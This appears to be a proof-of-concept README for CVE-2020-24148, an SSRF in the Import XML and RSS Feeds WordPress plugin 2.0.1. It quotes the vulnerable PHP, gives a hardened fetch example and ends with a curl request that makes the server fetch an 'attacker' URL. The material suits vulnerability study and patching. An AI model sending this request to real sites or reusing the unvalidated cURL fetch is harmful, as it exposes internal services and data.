
CVE-2020-24148 PoC — WordPress Code Issue Vulnerability

Associated Vulnerability
Title: WordPress Code Issue Vulnerability (CVE-2020-24148)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It can be used to host a personal blog site on a server running PHP and MySQL. The WordPress Import XML and RSS Feeds (import-xml-feed) plugin has a security vulnerability: version 2.0.1 contains a server-side request forgery (SSRF) reachable via the data parameter of the moove_read_xml action.
Description
CVE-2020-24148 Proof-of-Concept
Readme
# CVE-2020-24148

Server-side request forgery (SSRF) in the Import XML and RSS Feeds _(import-xml-feed)_ plugin **2.0.1** for WordPress via the `data` parameter in a `moove_read_xml` action.

## Vulnerable code

`/moove-actions.php`:

```php
...
	public function moove_read_xml() {

		$args = array(
			// esc_sql() only escapes the value for use in SQL; it places no
			// restriction on the URL that will be fetched below.
			'data' 		=> esc_sql( wp_unslash( $_POST['data'] ) ),
			'xmlaction'	=> sanitize_text_field( wp_unslash( $_POST['xmlaction'] ) ),
			'type'		=> sanitize_text_field( wp_unslash( $_POST['type'] ) ),
			'node'		=> sanitize_text_field( wp_unslash( $_POST['node'] ) ),
		);
		$move_importer = new Moove_Importer_Controller;
		$read_xml = $move_importer->moove_read_xml( $args );
		// The fetched body is echoed straight back to the caller.
		echo $read_xml;
		die();
	}
```

`/controllers/moove-controller.php`:

```php
class Moove_Importer_Controller {
	...
    public function moove_importer_get_content( $url ) {
        /* gets the data from a URL */

        $ch = curl_init();
        $timeout = 5;
        $user_agent = "Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0";

        // $url arrives unchanged from the 'data' POST parameter: no scheme,
        // host or address-range check is applied before the request is made.
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT,$user_agent);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
        // Redirects are followed as well, so the final destination is not
        // necessarily the host named in $url.
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, 1);
        curl_setopt($ch, CURLOPT_COOKIEFILE, '');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);

        // Error and status code are collected but never acted on; the body
        // is returned regardless of the HTTP status.
        $errors = curl_error($ch);
        $response = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        curl_close($ch);

        return $data;
    }
    public function moove_read_xml( $args ) {
        $return_array = array();
        $parent       = false;
        if ( $args['type'] === 'url' ) :
            // 'data' is passed through as the URL to fetch when type=url.
            $xml_string = Moove_Importer_Controller::moove_importer_get_content( $args['data'] );
            $xml_string = htmlspecialchars_decode( $xml_string );
    ...
```
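A hardened fetch routine, added here as an example and not code from the plugin, that validates the feed URL before any request and uses WordPress' own `wp_safe_remote_get()` in place of the raw cURL call with redirect following; the function names are hypothetical, and the AJAX handler that calls it should separately verify a nonce and the caller's capability.

```php
<?php
// Added example, not plugin code. Hypothetical hardened replacement for
// moove_importer_get_content(): only http(s) to a public host is fetched.
function moove_validate_feed_url( $url ) {
    $parts = wp_parse_url( $url );
    if ( ! $parts || empty( $parts['scheme'] ) || empty( $parts['host'] ) ) {
        return new WP_Error( 'bad_url', 'Malformed feed URL.' );
    }
    if ( ! in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true ) ) {
        return new WP_Error( 'bad_scheme', 'Only http(s) feeds are allowed.' );
    }
    // Resolve the host (or take a literal IP) and refuse loopback, private,
    // link-local and reserved ranges. A bracketed IPv6 literal passes neither
    // check below and is therefore rejected too (fail closed).
    $host = $parts['host'];
    $ips  = filter_var( $host, FILTER_VALIDATE_IP ) ? array( $host ) : gethostbynamel( $host );
    if ( empty( $ips ) ) {
        return new WP_Error( 'bad_host', 'Feed host does not resolve.' );
    }
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ( $ips as $ip ) {
        if ( ! filter_var( $ip, FILTER_VALIDATE_IP, $flags ) ) {
            return new WP_Error( 'internal_host', 'Feed host resolves to an internal address.' );
        }
    }
    return $url;
}

function moove_importer_get_content_safe( $url ) {
    $checked = moove_validate_feed_url( $url );
    if ( is_wp_error( $checked ) ) {
        return $checked;
    }
    // wp_safe_remote_get() re-validates the host through wp_http_validate_url()
    // at request time; redirects are disabled so only the checked host is contacted.
    $response = wp_safe_remote_get( $checked, array(
        'timeout'     => 5,
        'redirection' => 0,
        'user-agent'  => 'moove-importer (hardened example)',
    ) );
    if ( is_wp_error( $response ) ) {
        return $response;
    }
    if ( 200 !== (int) wp_remote_retrieve_response_code( $response ) ) {
        return new WP_Error( 'bad_status', 'Feed did not return HTTP 200.' );
    }
    return wp_remote_retrieve_body( $response );
}
```

Because the name is resolved once here and again inside the HTTP API, a host whose DNS answer changes between the two lookups can still slip through; pinning the resolved address at request time or routing outbound fetches through an egress proxy with its own allow-list closes that gap.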

## Proof-of-Concept

```bash
$ curl \
	-s "http://host/wp-admin/admin-ajax.php?action=moove_read_xml" \
	-d "type=url&data=http%3A%2F%2Fattacker%2F&xmlaction=preview&node=0"
```

## References

- [Nuclei templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-24148.yaml)
- [import-xml-feed:2.0.1](https://plugins.svn.wordpress.org/import-xml-feed/tags/2.0.1/)
File Snapshot

[4.0K] /data/pocs/ef883e51e2266cb65a224abbd93af4003aa2c1e2 └── [2.3K] README.md 0 directories, 1 file